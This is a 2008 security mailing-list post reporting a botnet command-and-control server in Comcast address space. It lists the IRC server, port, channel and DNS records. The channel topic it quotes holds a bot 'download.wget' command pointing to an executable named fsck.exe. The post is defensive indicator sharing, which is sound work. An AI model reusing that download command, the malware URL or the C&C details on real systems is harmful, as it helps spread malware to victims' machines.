[nsp-sec] comcast: botnet C&C in your space
Jose Nazario
jose at arbor.net
Mon Jul 7 09:47:43 EDT 2008
* C&C Server: 69.143.67.2:56213
* Server Password:
* Username: ragnub
* Nickname: USA|0101
* Channel: #pedoz#
* Channel topic: :~download.wget
http://www.ideumcommunications.com/portfolio/web_budo/fsck.exe fsck.exe 1
buzzed.opendns.be A 69.143.67.2
funnyshit.opendns.be A 69.143.67.2
2.67.143.69.in-addr.arpa PTR c-69-143-67-2.hsd1.md.comcast.net
AS | IP | AS Name
33657 | 69.143.67.2 | DNEO-OSP7 - Comcast Cable Communications,
Inc.
FYI ...
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
security researcher, office of the CTO, arbor networks
v: (734) 821 1427 http://asert.arbornetworks.com/
More information about the nsp-security
mailing list